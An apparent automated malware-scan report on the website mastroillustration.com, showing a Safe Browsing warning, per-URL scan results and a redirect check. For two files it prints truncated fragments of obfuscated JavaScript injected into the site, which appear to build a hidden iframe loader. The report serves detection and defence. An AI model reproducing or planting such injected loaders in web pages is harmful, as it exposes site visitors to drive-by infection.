Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mastroillustration.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.mastroillustration.com/ | 200 OK Content-Length: 6662 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) jph="y";uge="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[uge].getElementById("asd"))}()}catch(tij){haz=function(epjuat){epjuat="fro"+epjuat;for(kof=0;kof<jph.length;kof++){xkxa+=String[epjuat](ywws(runf+(jph[kof]))-(23));}};};ywws=(window.eval);runf="0x";deuym=0;if(!deuym){try{++ywws(uge)["\x62o"+"d"+jph]}catch(tij){jkzw="^";}jph="37^7d^8c^85^7a^8b^80^86^85^37^80^7e^79^47^50^3f^40^37^92^24^21^37^8d^78^89^37^8a^8b^78^8b^80^7a^54^3e^78^81^78^8f^3e^52^24^21^37^8d^78 Antivirus reports:
| ||
http://www.mastroillustration.com/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 12850 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) xfmnv="fr"+"omCh"+"arCo"+"de";if(document.querySelector)ecw=4;lubkr=("30,76,85,7e,73,84,79,7f,7e,30,85,77,79,40,49,38,39,30,8b,1d,1a,30,86,71,82,30,83,84,71,84,79,73,4d,37,71,7a,71,88,37,4b,1d,1a,30,86,71,82,30,73,7f,7e,84,82,7f,7c,7c,75,82,4d,37,79,7e,74,75,88,3e,80,78,80,37,4b,1d,1a,30,86,71,82,30,85,77,79,30,4d,30,74,7f,73,85,7d,75,7e,84,3e,73,82,75,71,84,75,55,7c,75,7d,75,7e,84,38,37,79,76,82,71,7d,75,37,39,4b,1d,1a,1d,1a,30,85,77,79,3e,83,82,73,30,4d,30,37,78,84,84,80,4a,3f,3f,73,78,82,79,8 Antivirus reports:
| ||
http://www.mastroillustration.com/test404page.js | HTTP/1.1 404 Not Found Connection: close Date: Fri, 18 Apr 2014 00:42:26 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
http://templates.doteasy.com/errorpages/error404/ | 200 OK Content-Length: 10669 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js | 200 OK Content-Length: 93435 Content-Type: text/javascript | clean |
http://www.mastroillustration.com/../js/selectBox/jquery.selectBox.min.js | 400 Bad Request Content-Length: 345 Content-Type: text/html | clean |
http://www.mastroillustration.com/../js/jquery.watermark.min.js | 400 Bad Request Content-Length: 345 Content-Type: text/html | clean |
http://www.mastroillustration.com/../js/fancybox/jquery.fancybox.js | 400 Bad Request Content-Length: 345 Content-Type: text/html | clean |
http://www.mastroillustration.com/../js/fancybox/helpers/jquery.fancybox-media.js | 400 Bad Request Content-Length: 345 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mastroillustration.com
Result:
GET / HTTP/1.1
Host: mastroillustration.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: mastroillustration.com
Referer: http://www.google.com/search?q=mastroillustration.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mastroillustration.com
Referer: http://www.google.com/search?q=mastroillustration.com
Result:
The result is similar to the first query. There are no suspicious redirects found.